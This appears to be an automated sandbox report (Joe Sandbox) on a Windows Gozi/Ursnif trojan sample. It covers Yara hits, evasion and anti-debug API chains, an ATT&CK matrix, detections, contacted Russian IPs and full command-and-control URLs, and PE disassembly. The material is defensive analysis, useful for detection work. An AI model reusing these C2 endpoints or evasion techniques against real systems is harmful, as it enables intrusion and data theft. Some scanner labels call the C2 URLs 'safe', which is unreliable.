    Source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_020216DF0_2_020216DF
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_0202832C0_2_0202832C
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_02021D8A0_2_02021D8A
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_0040110B GetProcAddress,NtCreateSection,memset,0_2_0040110B
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_00401459 NtMapViewOfSection,0_2_00401459
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_0202421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_0202421F
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_02028551 NtQueryVirtualMemory,0_2_02028551
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_01FC1C58 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,0_2_01FC1C58
    Source: Server.exeReversingLabs: Detection: 35%
    Source: Server.exeVirustotal: Detection: 46%
    Source: Server.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Server.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\Server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
    Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/2
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_020230D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_020230D5
    Source: C:\Users\user\Desktop\Server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\Server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\Server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\Server.exeUnpacked PE file: 0.2.Server.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\Server.exeUnpacked PE file: 0.2.Server.exe.400000.0.unpack .text:ER;.data:W;.comu:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_0202831B push ecx; ret 0_2_0202832B
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_02027F30 push ecx; ret 0_2_02027F39
    Source: Server.exeStatic PE information: section name: .comu
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: Yara matchFile source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTR
    Source: C:\Users\user\Desktop\Server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\Server.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
    Source: C:\Users\user\Desktop\Server.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
    Source: C:\Users\user\Desktop\Server.exeAPI call chain: ExitProcess graph end node

    Anti Debugging

    barindex
    Source: C:\Users\user\Desktop\Server.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_01FC0D90 mov eax, dword ptr fs:[00000030h]0_2_01FC0D90
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_01FC092B mov eax, dword ptr fs:[00000030h]0_2_01FC092B
    Source: C:\Users\user\Desktop\Server.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
    Source: C:\Users\user\Desktop\Server.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,0_2_01FC1C58
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_02023BD3 cpuid 0_2_02023BD3
    Source: C:\Users\user\Desktop\Server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_004015B0
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_00401D68
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_02023BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_02023BD3

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTR
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts2
    Windows Management Instrumentation
    Path InterceptionPath Interception1
    Virtualization/Sandbox Evasion
    OS Credential Dumping1
    System Time Discovery
    Remote Services11
    Archive Collected Data
    Exfiltration Over Other Network Medium2
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    Data Encrypted for Impact
    Default Accounts12
    Native API
    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Obfuscated Files or Information
    LSASS Memory1
    Security Software Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
    Software Packing
    Security Account Manager1
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
    Process Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer12
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
    Account Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
    System Owner/User Discovery
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
    Remote System Discovery
    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem124
    System Information Discovery
    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Server.exe36%ReversingLabsWin32.Trojan.Generic
    Server.exe46%VirustotalBrowse
    Server.exe100%Joe Sandbox ML
    No Antivirus matches
    SourceDetectionScannerLabelLinkDownload
    0.2.Server.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
    0.2.Server.exe.2020000.2.unpack100%AviraHEUR/AGEN.1245293Download File
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://193.230%Avira URL Cloudsafe
    http://62.173.142.81/drew/vtZ_2FDIi/MRLim5q_2FPOOIVwJV5p/mDG55l02bkwr36hqtHV/_2BXyU_2BkyUgVl9WIyeMc/2k07Y9nJ9nLtT/PcL77Drj/unLXMitiTeAgURShweMUOiB/jO6Gh6u4qj/R0YL8nr8_2Fe_2F8S/NmYC2zbFo_2F/_2F9OVp7R5L/glgHLP7bYaSidB/FZsufB1rfZCbhP2GWCC1X/tQ2Xe4zo9AyYJ7HA/jNvemogj1MfecHx/YKLEAqQON4Cy4b59f3/zq6LmLb43/Vud6lYhHL1LCLqJWQEpj/MZMy2z9wXkXjHl/Y_2BX.jlk0%Avira URL Cloudsafe
    http://193.233.175.113/drew/qHKukbBQWu/Xw77sqXTqtrxRWpPD/yl9MR0Y2eNmn/GbsfhYjdl8H/5GaIgAKgHB90sh/aMn4M6bKKJciYELDTreaM/i8dqMbDS0rDZpO_2/F2s0PNMupq8bNg2/sWxA9_2FGI7DvJntWq/sJDzxIUTO/r8bT3UibSNEQXXaTJdFi/yG6uB8JAsWc6GRKrJig/fWv9nw4MT1weBq8HJPcdl7/ZF86bHFVi_2FJ/yinUV20K/IPPC4VuFn7ORSOMnH_2FY6_/2FwmfjECDI/_2B41PRFw9jRfkH5W/0EbKz9E3ebE/0M10.jlk0%Avira URL Cloudsafe
    http://193.230%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    checklist.skype.com
    unknown
    unknownfalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://62.173.142.81/drew/vtZ_2FDIi/MRLim5q_2FPOOIVwJV5p/mDG55l02bkwr36hqtHV/_2BXyU_2BkyUgVl9WIyeMc/2k07Y9nJ9nLtT/PcL77Drj/unLXMitiTeAgURShweMUOiB/jO6Gh6u4qj/R0YL8nr8_2Fe_2F8S/NmYC2zbFo_2F/_2F9OVp7R5L/glgHLP7bYaSidB/FZsufB1rfZCbhP2GWCC1X/tQ2Xe4zo9AyYJ7HA/jNvemogj1MfecHx/YKLEAqQON4Cy4b59f3/zq6LmLb43/Vud6lYhHL1LCLqJWQEpj/MZMy2z9wXkXjHl/Y_2BX.jlktrue
      • Avira URL Cloud: safe
      unknown
      http://193.233.175.113/drew/qHKukbBQWu/Xw77sqXTqtrxRWpPD/yl9MR0Y2eNmn/GbsfhYjdl8H/5GaIgAKgHB90sh/aMn4M6bKKJciYELDTreaM/i8dqMbDS0rDZpO_2/F2s0PNMupq8bNg2/sWxA9_2FGI7DvJntWq/sJDzxIUTO/r8bT3UibSNEQXXaTJdFi/yG6uB8JAsWc6GRKrJig/fWv9nw4MT1weBq8HJPcdl7/ZF86bHFVi_2FJ/yinUV20K/IPPC4VuFn7ORSOMnH_2FY6_/2FwmfjECDI/_2B41PRFw9jRfkH5W/0EbKz9E3ebE/0M10.jlktrue
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://193.23Server.exe, 00000000.00000002.513863268.00000000023BC000.00000004.00000010.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      low
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      62.173.142.81
      unknownRussian Federation
      34300SPACENET-ASInternetServiceProviderRUtrue
      193.233.175.113
      unknownRussian Federation
      8749REDCOM-ASRedcomKhabarovskRussiaRUtrue
      Joe Sandbox Version:37.0.0 Beryl
      Analysis ID:830522
      Start date and time:2023-03-20 13:12:45 +01:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 54s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:13
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample file name:Server.exe
      Detection:MAL
      Classification:mal100.troj.evad.winEXE@1/0@1/2
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 41.6% (good quality ratio 39.7%)
      • Quality average: 81.1%
      • Quality standard deviation: 27.9%
      HCA Information:
      • Successful, ratio: 98%
      • Number of executed functions: 44
      • Number of non-executed functions: 37
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
      • Excluded domains from analysis (whitelisted): fs.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      No simulations
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      62.173.142.81server.exeGet hashmaliciousUrsnifBrowse
        server_(3).exeGet hashmaliciousUrsnifBrowse
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          REDCOM-ASRedcomKhabarovskRussiaRUvwhk2pXEXV.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          NSHOBcYzao.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          84Jr4N1k8F.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          3CIb3zSKE3.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          8A560S89RX.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          xa8BRNCP30.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          6ky1rvtDaE.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          bDmc9jL79d.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          T8FxdipX1b.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          JupX3a0cDu.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          XziDG9hNtG.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          WiBdTEh8im.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          1iSwNwm60H.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          A4xmKA51yW.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          PhSkPUIB6p.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          DsqMuWEi9N.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          fWHTkL3VEf.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          ImuCGAgRPB.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          Y1V4IIgFfH.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          SgqfeHM7jm.exeGet hashmaliciousAmadey, RedLineBrowse
          • 193.233.20.30
          SPACENET-ASInternetServiceProviderRUserver.exeGet hashmaliciousUrsnifBrowse
          • 62.173.142.81
          server_(3).exeGet hashmaliciousUrsnifBrowse
          • 62.173.142.81
          gozi_loader.bin.exeGet hashmaliciousUrsnifBrowse
          • 62.173.141.252
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.142.51
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.142.51
          KOYCdGz80D.exeGet hashmaliciousUrsnifBrowse
          • 62.173.142.51
          server.exeGet hashmaliciousUrsnif, CryptOneBrowse
          • 62.173.142.51
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.142.51
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.142.51
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.142.51
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.236
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.236
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.236
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.141.36
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.141.36
          lQj2udnlAj.exeGet hashmaliciousUrsnifBrowse
          • 62.173.141.36
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.141.36
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.138.6
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.138.6
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.138.6
          No context
          No context
          No created / dropped files found
          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):6.812179089793973
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:Server.exe
          File size:182272
          MD5:9565b4a15a8593ea3ec1f3c9d0a2e11a
          SHA1:0954c5387395f0552fa56f5b06b3bb159f0d430b
          SHA256:3aa75da2773573786f07530f5a09b8e0aacd0402fd11e14d8067b5f4607bbd6a
          SHA512:38c39811e09b664c70da24370fdc2cb555d698a1db868ed236d86c767cf5fb8751e8f5f1db667a4d807f6db39f8511b4753cfc59d9c85d0daa60ebef81a6adb8
          SSDEEP:3072:iu7sH/YqGkGehHskiO+hMIPZSyqGr7tA0jtejRXwtig0:psfYq/72jhMIhSyzrh7jte9Oig
          TLSH:16049EC392A07C51E4268A368E2FC2F4770DF891CE59AB66F3186F2F48BC172D562751
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.Q.f.Q.f.Q...Q.f.Q..4Q.f.Q...Q.f.Q..9Q.f.Q.f.Q.f.Q...Q.f.Q..0Q.f.Q..7Q.f.QRich.f.Q........PE..L....c.b...................
          Icon Hash:ba824242a5a2a28a
          Entrypoint:0x402f31
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
          Time Stamp:0x62DB63E7 [Sat Jul 23 02:58:47 2022 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:1
          File Version Major:5
          File Version Minor:1
          Subsystem Version Major:5
          Subsystem Version Minor:1
          Import Hash:2bf4bd16bd9a3948cc472dde1e8c8ccd
          Instruction
          call 00007F66CD126790h
          jmp 00007F66CD123DBEh
          mov eax, 0040D008h
          ret
          mov eax, dword ptr [0049D980h]
          push esi
          push 00000014h
          pop esi
          test eax, eax
          jne 00007F66CD123F39h
          mov eax, 00000200h
          jmp 00007F66CD123F38h
          cmp eax, esi
          jnl 00007F66CD123F39h
          mov eax, esi
          mov dword ptr [0049D980h], eax
          push 00000004h
          push eax
          call 00007F66CD12683Eh
          pop ecx
          pop ecx
          mov dword ptr [0049C960h], eax
          test eax, eax
          jne 00007F66CD123F50h
          push 00000004h
          push esi
          mov dword ptr [0049D980h], esi
          call 00007F66CD126825h
          pop ecx
          pop ecx
          mov dword ptr [0049C960h], eax
          test eax, eax
          jne 00007F66CD123F37h
          push 0000001Ah
          pop eax
          pop esi
          ret
          xor edx, edx
          mov ecx, 0040D008h
          jmp 00007F66CD123F37h
          mov eax, dword ptr [0049C960h]
          mov dword ptr [edx+eax], ecx
          add ecx, 20h
          add edx, 04h
          cmp ecx, 0040D288h
          jl 00007F66CD123F1Ch
          push FFFFFFFEh
          pop esi
          xor edx, edx
          mov ecx, 0040D018h
          push edi
          mov eax, edx
          sar eax, 05h
          mov eax, dword ptr [0049C860h+eax*4]
          mov edi, edx
          and edi, 1Fh
          shl edi, 06h
          mov eax, dword ptr [edi+eax]
          cmp eax, FFFFFFFFh
          je 00007F66CD123F3Ah
          cmp eax, esi
          je 00007F66CD123F36h
          test eax, eax
          jne 00007F66CD123F34h
          mov dword ptr [ecx], esi
          add ecx, 20h
          inc edx
          cmp ecx, 0040D078h
          jl 00007F66CD123F00h
          pop edi
          xor eax, eax
          pop esi
          ret
          call 00007F66CD124546h
          cmp byte ptr [00000000h], 00000000h
          Programming Language:
          • [C++] VS2010 build 30319
          • [ASM] VS2010 build 30319
          • [ C ] VS2010 build 30319
          • [IMP] VS2008 SP1 build 30729
          • [RES] VS2010 build 30319
          • [LNK] VS2010 build 30319
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0xb84c0x3c.text
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x9f0000xdaf0.rsrc
